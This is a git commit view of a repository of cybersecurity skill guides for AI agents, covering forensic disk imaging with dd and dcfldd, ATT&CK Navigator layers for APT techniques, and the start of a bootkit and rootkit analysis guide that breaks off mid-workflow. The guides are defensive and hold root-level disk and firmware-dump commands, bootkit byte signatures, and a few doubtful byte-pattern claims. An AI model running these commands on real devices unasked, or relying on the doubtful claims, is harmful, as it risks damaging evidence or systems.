mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-06-10 13:14:55 +03:00
Initial commit - 611 cybersecurity skills across all subdomains
This commit is contained in:
+14
@@ -0,0 +1,14 @@
|
||||
.claude/
|
||||
.claude-plugin/
|
||||
teams/
|
||||
node_modules/
|
||||
__pycache__/
|
||||
*.py[cod]
|
||||
*.bin
|
||||
*.pt
|
||||
*.safetensors
|
||||
*.gguf
|
||||
*.onnx
|
||||
.DS_Store
|
||||
Thumbs.db
|
||||
*.swp
|
||||
@@ -0,0 +1,45 @@
|
||||
# Anthropic Cybersecurity Skills
|
||||
|
||||
An open-source database of 600+ cybersecurity skills for AI agents, practitioners, and security teams.
|
||||
|
||||
## Structure
|
||||
|
||||
```
|
||||
skills/cybersecurity/{skill-name}/
|
||||
├── SKILL.md # Skill definition with YAML frontmatter
|
||||
├── references/
|
||||
│ ├── standards.md # Real standard numbers, CVE refs, NIST/MITRE links
|
||||
│ └── workflows.md # Deep technical procedure reference
|
||||
├── scripts/
|
||||
│ └── process.py # Real practitioner helper script
|
||||
└── assets/
|
||||
└── template.md # Real filled-in checklist/report template
|
||||
```
|
||||
|
||||
## Domains Covered
|
||||
|
||||
- Web Application Security
|
||||
- Network Security
|
||||
- Penetration Testing
|
||||
- Red Teaming
|
||||
- Digital Forensics & Incident Response (DFIR)
|
||||
- Malware Analysis
|
||||
- Threat Intelligence
|
||||
- Cloud Security
|
||||
- Container Security
|
||||
- Identity & Access Management
|
||||
- Cryptography
|
||||
- Vulnerability Management
|
||||
- Compliance & Governance
|
||||
- Zero Trust Architecture
|
||||
- OT/ICS Security
|
||||
- DevSecOps
|
||||
- And more...
|
||||
|
||||
## Usage
|
||||
|
||||
Each `SKILL.md` follows the agentskills.io open standard with YAML frontmatter and structured Markdown body.
|
||||
|
||||
## License
|
||||
|
||||
MIT
|
||||
@@ -0,0 +1,230 @@
|
||||
---
|
||||
name: acquiring-disk-image-with-dd-and-dcfldd
|
||||
description: Create forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through hash verification.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, disk-imaging, evidence-acquisition, dd, dcfldd, hash-verification]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Acquiring Disk Image with dd and dcfldd
|
||||
|
||||
## When to Use
|
||||
- When you need to create a forensic copy of a suspect drive for investigation
|
||||
- During incident response when preserving volatile disk evidence before analysis
|
||||
- When law enforcement or legal proceedings require a verified bit-for-bit copy
|
||||
- Before performing any destructive analysis on a storage device
|
||||
- When acquiring images from physical drives, USB devices, or memory cards
|
||||
|
||||
## Prerequisites
|
||||
- Linux-based forensic workstation (SIFT, Kali, or any Linux distro)
|
||||
- `dd` (pre-installed on all Linux systems) or `dcfldd` (enhanced forensic version)
|
||||
- Write-blocker hardware or software write-blocking configured
|
||||
- Destination drive with sufficient storage (larger than source)
|
||||
- Root/sudo privileges on the forensic workstation
|
||||
- SHA-256 or MD5 hashing utilities (`sha256sum`, `md5sum`)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the Target Device and Enable Write Protection
|
||||
|
||||
```bash
|
||||
# List all connected block devices to identify the target
|
||||
lsblk -o NAME,SIZE,TYPE,MOUNTPOINT,MODEL
|
||||
|
||||
# Verify the device details
|
||||
fdisk -l /dev/sdb
|
||||
|
||||
# Enable software write-blocking (if no hardware blocker)
|
||||
blockdev --setro /dev/sdb
|
||||
|
||||
# Verify read-only status
|
||||
blockdev --getro /dev/sdb
|
||||
# Output: 1 (means read-only is enabled)
|
||||
|
||||
# Alternatively, use udev rules for persistent write-blocking
|
||||
echo 'SUBSYSTEM=="block", ATTRS{serial}=="WD-WCAV5H861234", ATTR{ro}="1"' > /etc/udev/rules.d/99-writeblock.rules
|
||||
udevadm control --reload-rules
|
||||
```
|
||||
|
||||
### Step 2: Prepare the Destination and Document the Source
|
||||
|
||||
```bash
|
||||
# Create case directory structure
|
||||
mkdir -p /cases/case-2024-001/{images,hashes,logs,notes}
|
||||
|
||||
# Document source drive information
|
||||
hdparm -I /dev/sdb > /cases/case-2024-001/notes/source_drive_info.txt
|
||||
|
||||
# Record the serial number and model
|
||||
smartctl -i /dev/sdb >> /cases/case-2024-001/notes/source_drive_info.txt
|
||||
|
||||
# Pre-hash the source device
|
||||
sha256sum /dev/sdb | tee /cases/case-2024-001/hashes/source_hash_before.txt
|
||||
```
|
||||
|
||||
### Step 3: Acquire the Image Using dd
|
||||
|
||||
```bash
|
||||
# Basic dd acquisition with progress and error handling
|
||||
dd if=/dev/sdb of=/cases/case-2024-001/images/evidence.dd \
|
||||
bs=4096 \
|
||||
conv=noerror,sync \
|
||||
status=progress 2>&1 | tee /cases/case-2024-001/logs/dd_acquisition.log
|
||||
|
||||
# For compressed images to save space
|
||||
dd if=/dev/sdb bs=4096 conv=noerror,sync status=progress | \
|
||||
gzip -c > /cases/case-2024-001/images/evidence.dd.gz
|
||||
|
||||
# Using dd with a specific count for partial acquisition
|
||||
dd if=/dev/sdb of=/cases/case-2024-001/images/first_1gb.dd \
|
||||
bs=1M count=1024 status=progress
|
||||
```
|
||||
|
||||
### Step 4: Acquire Using dcfldd (Preferred Forensic Method)
|
||||
|
||||
```bash
|
||||
# Install dcfldd if not present
|
||||
apt-get install dcfldd
|
||||
|
||||
# Acquire image with built-in hashing and split output
|
||||
dcfldd if=/dev/sdb \
|
||||
of=/cases/case-2024-001/images/evidence.dd \
|
||||
hash=sha256,md5 \
|
||||
hashwindow=1G \
|
||||
hashlog=/cases/case-2024-001/hashes/acquisition_hashes.txt \
|
||||
bs=4096 \
|
||||
conv=noerror,sync \
|
||||
errlog=/cases/case-2024-001/logs/dcfldd_errors.log
|
||||
|
||||
# Split large images into manageable segments
|
||||
dcfldd if=/dev/sdb \
|
||||
of=/cases/case-2024-001/images/evidence.dd \
|
||||
hash=sha256 \
|
||||
hashlog=/cases/case-2024-001/hashes/split_hashes.txt \
|
||||
bs=4096 \
|
||||
split=2G \
|
||||
splitformat=aa
|
||||
|
||||
# Acquire with verification pass
|
||||
dcfldd if=/dev/sdb \
|
||||
of=/cases/case-2024-001/images/evidence.dd \
|
||||
hash=sha256 \
|
||||
hashlog=/cases/case-2024-001/hashes/verification.txt \
|
||||
vf=/cases/case-2024-001/images/evidence.dd \
|
||||
verifylog=/cases/case-2024-001/logs/verify.log
|
||||
```
|
||||
|
||||
### Step 5: Verify Image Integrity
|
||||
|
||||
```bash
|
||||
# Hash the acquired image
|
||||
sha256sum /cases/case-2024-001/images/evidence.dd | \
|
||||
tee /cases/case-2024-001/hashes/image_hash.txt
|
||||
|
||||
# Compare source and image hashes
|
||||
diff <(sha256sum /dev/sdb | awk '{print $1}') \
|
||||
<(sha256sum /cases/case-2024-001/images/evidence.dd | awk '{print $1}')
|
||||
|
||||
# If using split images, verify each segment
|
||||
sha256sum /cases/case-2024-001/images/evidence.dd.* | \
|
||||
tee /cases/case-2024-001/hashes/split_image_hashes.txt
|
||||
|
||||
# Re-hash source to confirm no changes occurred
|
||||
sha256sum /dev/sdb | tee /cases/case-2024-001/hashes/source_hash_after.txt
|
||||
diff /cases/case-2024-001/hashes/source_hash_before.txt \
|
||||
/cases/case-2024-001/hashes/source_hash_after.txt
|
||||
```
|
||||
|
||||
### Step 6: Document the Acquisition Process
|
||||
|
||||
```bash
|
||||
# Generate acquisition report
|
||||
cat << 'EOF' > /cases/case-2024-001/notes/acquisition_report.txt
|
||||
DISK IMAGE ACQUISITION REPORT
|
||||
==============================
|
||||
Case Number: 2024-001
|
||||
Date/Time: $(date -u +"%Y-%m-%d %H:%M:%S UTC")
|
||||
Examiner: [Name]
|
||||
|
||||
Source Device: /dev/sdb
|
||||
Model: [from hdparm output]
|
||||
Serial: [from hdparm output]
|
||||
Size: [from fdisk output]
|
||||
|
||||
Acquisition Tool: dcfldd v1.9.1
|
||||
Block Size: 4096
|
||||
Write Blocker: [Hardware/Software model]
|
||||
|
||||
Image File: evidence.dd
|
||||
Image Hash (SHA-256): [from hash file]
|
||||
Source Hash (SHA-256): [from hash file]
|
||||
Hash Match: YES/NO
|
||||
|
||||
Errors During Acquisition: [from error log]
|
||||
EOF
|
||||
|
||||
# Compress logs for archival
|
||||
tar -czf /cases/case-2024-001/acquisition_package.tar.gz \
|
||||
/cases/case-2024-001/hashes/ \
|
||||
/cases/case-2024-001/logs/ \
|
||||
/cases/case-2024-001/notes/
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| Bit-for-bit copy | Exact replica of source including unallocated space and slack space |
|
||||
| Write blocker | Hardware or software mechanism preventing writes to evidence media |
|
||||
| Hash verification | Cryptographic hash comparing source and image to prove integrity |
|
||||
| Block size (bs) | Transfer chunk size affecting speed; 4096 or 64K typical for forensics |
|
||||
| conv=noerror,sync | Continue on read errors and pad with zeros to maintain offset alignment |
|
||||
| Chain of custody | Documented trail proving evidence has not been tampered with |
|
||||
| Split imaging | Breaking large images into smaller files for storage and transport |
|
||||
| Raw/dd format | Bit-for-bit image format without metadata container overhead |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| dd | Standard Unix disk duplication utility for raw imaging |
|
||||
| dcfldd | DoD Computer Forensics Laboratory enhanced version of dd with hashing |
|
||||
| dc3dd | Another forensic dd variant from the DoD Cyber Crime Center |
|
||||
| sha256sum | SHA-256 hash calculation for integrity verification |
|
||||
| blockdev | Linux command to set block device read-only mode |
|
||||
| hdparm | Drive identification and parameter reporting |
|
||||
| smartctl | S.M.A.R.T. data retrieval for drive health and identification |
|
||||
| lsblk | Block device enumeration and identification |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Acquiring a Suspect Laptop Hard Drive**
|
||||
Connect the drive via a Tableau T35u hardware write-blocker, identify as `/dev/sdb`, use dcfldd with SHA-256 hashing, split into 4GB segments for DVD archival, verify hashes match, document in case notes.
|
||||
|
||||
**Scenario 2: Imaging a USB Flash Drive from a Compromised Workstation**
|
||||
Use software write-blocking with `blockdev --setro`, acquire with dcfldd including MD5 and SHA-256 dual hashing, image is small enough for single file, verify and store on encrypted case drive.
|
||||
|
||||
**Scenario 3: Remote Acquisition Over Network**
|
||||
Use dd piped through netcat or ssh for remote acquisition: `ssh root@remote "dd if=/dev/sda bs=4096" | dd of=remote_image.dd bs=4096`, hash both ends independently to verify transfer integrity.
|
||||
|
||||
**Scenario 4: Acquiring from a Failing Drive**
|
||||
Use `ddrescue` first to recover readable sectors, then use dd with `conv=noerror,sync` to fill gaps with zeros, document which sectors were unreadable in the error log.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
Acquisition Summary:
|
||||
Source: /dev/sdb (500GB Western Digital WD5000AAKX)
|
||||
Destination: /cases/case-2024-001/images/evidence.dd
|
||||
Tool: dcfldd 1.9.1
|
||||
Block Size: 4096 bytes
|
||||
Duration: 2h 15m 32s
|
||||
Bytes Copied: 500,107,862,016
|
||||
Errors: 0 bad sectors
|
||||
Source SHA-256: a3f2b8c9d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1
|
||||
Image SHA-256: a3f2b8c9d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1
|
||||
Verification: PASSED - Hashes match
|
||||
```
|
||||
@@ -0,0 +1,257 @@
|
||||
---
|
||||
name: analyzing-apt-group-with-mitre-navigator
|
||||
description: Analyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap analysis and threat-informed defense.
|
||||
domain: cybersecurity
|
||||
subdomain: threat-intelligence
|
||||
tags: [mitre-attack, navigator, apt, threat-actor, ttp-analysis, heatmap, detection-gap, threat-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing APT Group with MITRE ATT&CK Navigator
|
||||
|
||||
## Overview
|
||||
|
||||
MITRE ATT&CK Navigator is a web-based tool for annotating and exploring ATT&CK matrices, enabling analysts to visualize threat actor technique coverage, compare multiple APT groups, identify detection gaps, and build threat-informed defense strategies. This skill covers querying ATT&CK data programmatically, mapping APT group TTPs to Navigator layers, creating multi-layer overlays for gap analysis, and generating actionable intelligence reports for detection engineering teams.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `attackcti`, `mitreattack-python`, `stix2`, `requests` libraries
|
||||
- ATT&CK Navigator (https://mitre-attack.github.io/attack-navigator/) or local deployment
|
||||
- Understanding of ATT&CK Enterprise matrix: 14 Tactics, 200+ Techniques, Sub-techniques
|
||||
- Access to threat intelligence reports or MISP/OpenCTI for threat actor data
|
||||
- Familiarity with STIX 2.1 Intrusion Set and Attack Pattern objects
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### ATT&CK Navigator Layers
|
||||
|
||||
Navigator layers are JSON files that annotate ATT&CK techniques with scores, colors, comments, and metadata. Each layer can represent a single APT group's technique usage, a detection capability map, or a combined overlay. Layer version 4.5 supports enterprise-attack, mobile-attack, and ics-attack domains with filtering by platform (Windows, Linux, macOS, Cloud, Azure AD, Office 365, SaaS).
|
||||
|
||||
### APT Group Profiles in ATT&CK
|
||||
|
||||
ATT&CK catalogs over 140 threat groups with documented technique usage. Each group profile includes aliases, targeted sectors, associated campaigns, software used, and technique mappings with procedure-level detail. Groups are identified by G-codes (e.g., G0016 for APT29, G0007 for APT28, G0032 for Lazarus Group).
|
||||
|
||||
### Multi-Layer Analysis
|
||||
|
||||
The Navigator supports loading multiple layers simultaneously, allowing analysts to overlay threat actor TTPs against detection coverage to identify gaps, compare multiple APT groups to find common techniques worth prioritizing, and track technique coverage changes over time.
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Query ATT&CK Data for APT Group
|
||||
|
||||
```python
|
||||
from attackcti import attack_client
|
||||
import json
|
||||
|
||||
lift = attack_client()
|
||||
|
||||
# Get all threat groups
|
||||
groups = lift.get_groups()
|
||||
print(f"Total ATT&CK groups: {len(groups)}")
|
||||
|
||||
# Find APT29 (Cozy Bear / Midnight Blizzard)
|
||||
apt29 = next((g for g in groups if g.get('name') == 'APT29'), None)
|
||||
if apt29:
|
||||
print(f"Group: {apt29['name']}")
|
||||
print(f"Aliases: {apt29.get('aliases', [])}")
|
||||
print(f"Description: {apt29.get('description', '')[:300]}")
|
||||
|
||||
# Get techniques used by APT29 (G0016)
|
||||
techniques = lift.get_techniques_used_by_group("G0016")
|
||||
print(f"APT29 uses {len(techniques)} techniques")
|
||||
|
||||
technique_map = {}
|
||||
for tech in techniques:
|
||||
tech_id = ""
|
||||
for ref in tech.get("external_references", []):
|
||||
if ref.get("source_name") == "mitre-attack":
|
||||
tech_id = ref.get("external_id", "")
|
||||
break
|
||||
if tech_id:
|
||||
tactics = [p.get("phase_name", "") for p in tech.get("kill_chain_phases", [])]
|
||||
technique_map[tech_id] = {
|
||||
"name": tech.get("name", ""),
|
||||
"tactics": tactics,
|
||||
"description": tech.get("description", "")[:500],
|
||||
"platforms": tech.get("x_mitre_platforms", []),
|
||||
"data_sources": tech.get("x_mitre_data_sources", []),
|
||||
}
|
||||
```
|
||||
|
||||
### Step 2: Generate Navigator Layer JSON
|
||||
|
||||
```python
|
||||
def create_navigator_layer(group_name, technique_map, color="#ff6666"):
|
||||
techniques_list = []
|
||||
for tech_id, info in technique_map.items():
|
||||
for tactic in info["tactics"]:
|
||||
techniques_list.append({
|
||||
"techniqueID": tech_id,
|
||||
"tactic": tactic,
|
||||
"color": color,
|
||||
"comment": info["name"],
|
||||
"enabled": True,
|
||||
"score": 100,
|
||||
"metadata": [
|
||||
{"name": "group", "value": group_name},
|
||||
{"name": "platforms", "value": ", ".join(info["platforms"])},
|
||||
],
|
||||
})
|
||||
|
||||
layer = {
|
||||
"name": f"{group_name} TTP Coverage",
|
||||
"versions": {"attack": "16.1", "navigator": "5.1.0", "layer": "4.5"},
|
||||
"domain": "enterprise-attack",
|
||||
"description": f"Techniques attributed to {group_name}",
|
||||
"filters": {
|
||||
"platforms": ["Linux", "macOS", "Windows", "Cloud",
|
||||
"Azure AD", "Office 365", "SaaS", "Google Workspace"]
|
||||
},
|
||||
"sorting": 0,
|
||||
"layout": {
|
||||
"layout": "side", "aggregateFunction": "average",
|
||||
"showID": True, "showName": True,
|
||||
"showAggregateScores": False, "countUnscored": False,
|
||||
},
|
||||
"hideDisabled": False,
|
||||
"techniques": techniques_list,
|
||||
"gradient": {"colors": ["#ffffff", color], "minValue": 0, "maxValue": 100},
|
||||
"legendItems": [
|
||||
{"label": f"Used by {group_name}", "color": color},
|
||||
{"label": "Not observed", "color": "#ffffff"},
|
||||
],
|
||||
"showTacticRowBackground": True,
|
||||
"tacticRowBackground": "#dddddd",
|
||||
"selectTechniquesAcrossTactics": True,
|
||||
"selectSubtechniquesWithParent": False,
|
||||
"selectVisibleTechniques": False,
|
||||
}
|
||||
return layer
|
||||
|
||||
layer = create_navigator_layer("APT29", technique_map)
|
||||
with open("apt29_layer.json", "w") as f:
|
||||
json.dump(layer, f, indent=2)
|
||||
print("[+] Layer saved: apt29_layer.json")
|
||||
```
|
||||
|
||||
### Step 3: Compare Multiple APT Groups
|
||||
|
||||
```python
|
||||
groups_to_compare = {"G0016": "APT29", "G0007": "APT28", "G0032": "Lazarus Group"}
|
||||
group_techniques = {}
|
||||
|
||||
for gid, gname in groups_to_compare.items():
|
||||
techs = lift.get_techniques_used_by_group(gid)
|
||||
tech_ids = set()
|
||||
for t in techs:
|
||||
for ref in t.get("external_references", []):
|
||||
if ref.get("source_name") == "mitre-attack":
|
||||
tech_ids.add(ref.get("external_id", ""))
|
||||
group_techniques[gname] = tech_ids
|
||||
|
||||
common_to_all = set.intersection(*group_techniques.values())
|
||||
print(f"Techniques common to all groups: {len(common_to_all)}")
|
||||
for tid in sorted(common_to_all):
|
||||
print(f" {tid}")
|
||||
|
||||
for gname, techs in group_techniques.items():
|
||||
others = set.union(*[t for n, t in group_techniques.items() if n != gname])
|
||||
unique = techs - others
|
||||
print(f"\nUnique to {gname}: {len(unique)} techniques")
|
||||
```
|
||||
|
||||
### Step 4: Detection Gap Analysis with Layer Overlay
|
||||
|
||||
```python
|
||||
# Define your current detection capabilities
|
||||
detected_techniques = {
|
||||
"T1059", "T1059.001", "T1071", "T1071.001", "T1566", "T1566.001",
|
||||
"T1547", "T1547.001", "T1053", "T1053.005", "T1078", "T1027",
|
||||
}
|
||||
|
||||
actor_techniques = set(technique_map.keys())
|
||||
covered = actor_techniques.intersection(detected_techniques)
|
||||
gaps = actor_techniques - detected_techniques
|
||||
|
||||
print(f"=== Detection Gap Analysis for APT29 ===")
|
||||
print(f"Actor techniques: {len(actor_techniques)}")
|
||||
print(f"Detected: {len(covered)} ({len(covered)/len(actor_techniques)*100:.0f}%)")
|
||||
print(f"Gaps: {len(gaps)} ({len(gaps)/len(actor_techniques)*100:.0f}%)")
|
||||
|
||||
# Create gap layer (red = undetected, green = detected)
|
||||
gap_techniques = []
|
||||
for tech_id in actor_techniques:
|
||||
info = technique_map.get(tech_id, {})
|
||||
for tactic in info.get("tactics", [""]):
|
||||
color = "#66ff66" if tech_id in detected_techniques else "#ff3333"
|
||||
gap_techniques.append({
|
||||
"techniqueID": tech_id,
|
||||
"tactic": tactic,
|
||||
"color": color,
|
||||
"comment": f"{'DETECTED' if tech_id in detected_techniques else 'GAP'}: {info.get('name', '')}",
|
||||
"enabled": True,
|
||||
"score": 100 if tech_id in detected_techniques else 0,
|
||||
})
|
||||
|
||||
gap_layer = {
|
||||
"name": "APT29 Detection Gap Analysis",
|
||||
"versions": {"attack": "16.1", "navigator": "5.1.0", "layer": "4.5"},
|
||||
"domain": "enterprise-attack",
|
||||
"description": "Green = detected, Red = gap",
|
||||
"techniques": gap_techniques,
|
||||
"gradient": {"colors": ["#ff3333", "#66ff66"], "minValue": 0, "maxValue": 100},
|
||||
"legendItems": [
|
||||
{"label": "Detected", "color": "#66ff66"},
|
||||
{"label": "Detection Gap", "color": "#ff3333"},
|
||||
],
|
||||
}
|
||||
with open("apt29_gap_layer.json", "w") as f:
|
||||
json.dump(gap_layer, f, indent=2)
|
||||
```
|
||||
|
||||
### Step 5: Tactic Breakdown Analysis
|
||||
|
||||
```python
|
||||
from collections import defaultdict
|
||||
|
||||
tactic_breakdown = defaultdict(list)
|
||||
for tech_id, info in technique_map.items():
|
||||
for tactic in info["tactics"]:
|
||||
tactic_breakdown[tactic].append({"id": tech_id, "name": info["name"]})
|
||||
|
||||
tactic_order = [
|
||||
"reconnaissance", "resource-development", "initial-access",
|
||||
"execution", "persistence", "privilege-escalation",
|
||||
"defense-evasion", "credential-access", "discovery",
|
||||
"lateral-movement", "collection", "command-and-control",
|
||||
"exfiltration", "impact",
|
||||
]
|
||||
|
||||
print("\n=== APT29 Tactic Breakdown ===")
|
||||
for tactic in tactic_order:
|
||||
techs = tactic_breakdown.get(tactic, [])
|
||||
if techs:
|
||||
print(f"\n{tactic.upper()} ({len(techs)} techniques):")
|
||||
for t in techs:
|
||||
print(f" {t['id']}: {t['name']}")
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- ATT&CK data queried successfully via TAXII server
|
||||
- APT group mapped to all documented techniques with procedure examples
|
||||
- Navigator layer JSON validates and renders correctly in ATT&CK Navigator
|
||||
- Multi-layer overlay shows threat actor vs. detection coverage
|
||||
- Detection gap analysis identifies unmonitored techniques with data source recommendations
|
||||
- Cross-group comparison reveals shared and unique TTPs
|
||||
- Output is actionable for detection engineering prioritization
|
||||
|
||||
## References
|
||||
|
||||
- [MITRE ATT&CK Navigator](https://mitre-attack.github.io/attack-navigator/)
|
||||
- [ATT&CK Groups](https://attack.mitre.org/groups/)
|
||||
- [attackcti Python Library](https://github.com/OTRF/ATTACK-Python-Client)
|
||||
- [Navigator Layer Format v4.5](https://github.com/mitre-attack/attack-navigator/blob/master/layers/LAYERFORMATv4_5.md)
|
||||
- [CISA Best Practices for MITRE ATT&CK Mapping](https://www.cisa.gov/sites/default/files/2023-01/Best%20Practices%20for%20MITRE%20ATTCK%20Mapping.pdf)
|
||||
- [Picus: Leverage MITRE ATT&CK for Threat Intelligence](https://www.picussecurity.com/how-to-leverage-the-mitre-attack-framework-for-threat-intelligence)
|
||||
@@ -0,0 +1,344 @@
|
||||
---
|
||||
name: analyzing-bootkit-and-rootkit-samples
|
||||
description: >
|
||||
Analyzes bootkit and advanced rootkit malware that infects the Master Boot Record (MBR),
|
||||
Volume Boot Record (VBR), or UEFI firmware to gain persistence below the operating system.
|
||||
Covers boot sector analysis, UEFI module inspection, and anti-rootkit detection techniques.
|
||||
Activates for requests involving bootkit analysis, MBR malware investigation, UEFI
|
||||
persistence analysis, or pre-OS malware detection.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, bootkit, rootkit, UEFI, MBR-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Bootkit and Rootkit Samples
|
||||
|
||||
## When to Use
|
||||
|
||||
- A system shows signs of compromise that persist through OS reinstallation
|
||||
- Antivirus and EDR are unable to detect malware despite clear evidence of compromise
|
||||
- UEFI Secure Boot has been disabled or shows integrity violations
|
||||
- Memory forensics reveals rootkit behavior (hidden processes, hooked system calls)
|
||||
- Investigating nation-state level threats known to deploy bootkits (APT28, APT41, Equation Group)
|
||||
|
||||
**Do not use** for standard user-mode malware; bootkits and rootkits operate at a fundamentally different level requiring specialized analysis techniques.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Disk imaging tools (dd, FTK Imager) for acquiring MBR/VBR sectors
|
||||
- UEFITool for UEFI firmware volume analysis and module extraction
|
||||
- chipsec for hardware-level firmware security assessment
|
||||
- Ghidra with x86 real-mode and 16-bit support for MBR code analysis
|
||||
- Volatility 3 for kernel-level rootkit artifact detection
|
||||
- Bootable Linux live USB for offline system analysis
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Acquire Boot Sectors and Firmware
|
||||
|
||||
Extract MBR, VBR, and UEFI firmware for offline analysis:
|
||||
|
||||
```bash
|
||||
# Acquire MBR (first 512 bytes of disk)
|
||||
dd if=/dev/sda of=mbr.bin bs=512 count=1
|
||||
|
||||
# Acquire first track (usually contains bootkit code beyond MBR)
|
||||
dd if=/dev/sda of=first_track.bin bs=512 count=63
|
||||
|
||||
# Acquire VBR (Volume Boot Record - first sector of partition)
|
||||
dd if=/dev/sda1 of=vbr.bin bs=512 count=1
|
||||
|
||||
# Acquire UEFI System Partition
|
||||
mkdir /mnt/efi
|
||||
mount /dev/sda1 /mnt/efi
|
||||
cp -r /mnt/efi/EFI /analysis/efi_backup/
|
||||
|
||||
# Dump UEFI firmware (requires chipsec or flashrom)
|
||||
# Using chipsec:
|
||||
python chipsec_util.py spi dump firmware.rom
|
||||
|
||||
# Using flashrom:
|
||||
flashrom -p internal -r firmware.rom
|
||||
|
||||
# Verify firmware dump integrity
|
||||
sha256sum firmware.rom
|
||||
```
|
||||
|
||||
### Step 2: Analyze MBR/VBR for Bootkit Code
|
||||
|
||||
Examine boot sector code for malicious modifications:
|
||||
|
||||
```bash
|
||||
# Disassemble MBR code (16-bit real mode)
|
||||
ndisasm -b16 mbr.bin > mbr_disasm.txt
|
||||
|
||||
# Compare MBR with known-good Windows MBR
|
||||
# Standard Windows MBR begins with: EB 5A 90 (JMP 0x5C, NOP)
|
||||
# Standard Windows 10 MBR: 33 C0 8E D0 BC 00 7C (XOR AX,AX; MOV SS,AX; MOV SP,7C00h)
|
||||
|
||||
python3 << 'PYEOF'
|
||||
with open("mbr.bin", "rb") as f:
|
||||
mbr = f.read()
|
||||
|
||||
# Check MBR signature (bytes 510-511 should be 0x55AA)
|
||||
if mbr[510:512] == b'\x55\xAA':
|
||||
print("[*] Valid MBR signature (0x55AA)")
|
||||
else:
|
||||
print("[!] Invalid MBR signature")
|
||||
|
||||
# Check for known bootkit signatures
|
||||
bootkit_sigs = {
|
||||
b'\xE8\x00\x00\x5E\x81\xEE': "TDL4/Alureon bootkit",
|
||||
b'\xFA\x33\xC0\x8E\xD0\xBC\x00\x7C\x8B\xF4\x50\x07': "Standard Windows MBR (clean)",
|
||||
b'\xEB\x5A\x90\x4E\x54\x46\x53': "Standard NTFS VBR (clean)",
|
||||
}
|
||||
|
||||
for sig, name in bootkit_sigs.items():
|
||||
if sig in mbr:
|
||||
print(f"[{'!' if 'clean' not in name else '*'}] Signature match: {name}")
|
||||
|
||||
# Check partition table entries
|
||||
print("\nPartition Table:")
|
||||
for i in range(4):
|
||||
offset = 446 + (i * 16)
|
||||
entry = mbr[offset:offset+16]
|
||||
if entry != b'\x00' * 16:
|
||||
boot_flag = "Active" if entry[0] == 0x80 else "Inactive"
|
||||
part_type = entry[4]
|
||||
start_lba = int.from_bytes(entry[8:12], 'little')
|
||||
size_lba = int.from_bytes(entry[12:16], 'little')
|
||||
print(f" Partition {i+1}: Type=0x{part_type:02X} {boot_flag} Start=LBA {start_lba} Size={size_lba} sectors")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 3: Analyze UEFI Firmware for Implants
|
||||
|
||||
Inspect UEFI firmware volumes for unauthorized modules:
|
||||
|
||||
```bash
|
||||
# Extract UEFI firmware components with UEFITool
|
||||
# GUI: Open firmware.rom -> Inspect firmware volumes
|
||||
# CLI:
|
||||
UEFIExtract firmware.rom all
|
||||
|
||||
# List all DXE drivers (most common target for UEFI implants)
|
||||
find firmware.rom.dump -name "*.efi" -exec file {} \;
|
||||
|
||||
# Compare against known-good firmware module list
|
||||
# Each UEFI module has a GUID - compare against vendor baseline
|
||||
|
||||
# Verify Secure Boot configuration
|
||||
python chipsec_main.py -m common.secureboot.variables
|
||||
|
||||
# Check SPI flash write protection
|
||||
python chipsec_main.py -m common.bios_wp
|
||||
|
||||
# Check for known UEFI malware patterns
|
||||
yara -r uefi_malware.yar firmware.rom
|
||||
```
|
||||
|
||||
```
|
||||
Known UEFI Bootkit Detection Points:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
LoJax (APT28):
|
||||
- Modified SPI flash
|
||||
- Added DXE driver that drops agent to Windows
|
||||
- Persists through OS reinstall and disk replacement
|
||||
|
||||
BlackLotus:
|
||||
- Exploits CVE-2022-21894 to bypass Secure Boot
|
||||
- Modifies EFI System Partition bootloader
|
||||
- Installs kernel driver during boot
|
||||
|
||||
CosmicStrand:
|
||||
- Modifies CORE_DXE firmware module
|
||||
- Hooks kernel initialization during boot
|
||||
- Drops shellcode into Windows kernel memory
|
||||
|
||||
MoonBounce:
|
||||
- SPI flash implant in CORE_DXE module
|
||||
- Modified GetVariable() function
|
||||
- Deploys user-mode implant through boot chain
|
||||
|
||||
ESPecter:
|
||||
- Modifies Windows Boot Manager on ESP
|
||||
- Patches winload.efi to disable DSE
|
||||
- Loads unsigned kernel driver
|
||||
```
|
||||
|
||||
### Step 4: Detect Kernel-Level Rootkit Behavior
|
||||
|
||||
Analyze the running system for rootkit artifacts:
|
||||
|
||||
```bash
|
||||
# Memory forensics for rootkit detection
|
||||
# SSDT hook detection
|
||||
vol3 -f memory.dmp windows.ssdt | grep -v "ntoskrnl\|win32k"
|
||||
|
||||
# Hidden processes (DKOM)
|
||||
vol3 -f memory.dmp windows.psscan > psscan.txt
|
||||
vol3 -f memory.dmp windows.pslist > pslist.txt
|
||||
# Diff to find hidden processes
|
||||
|
||||
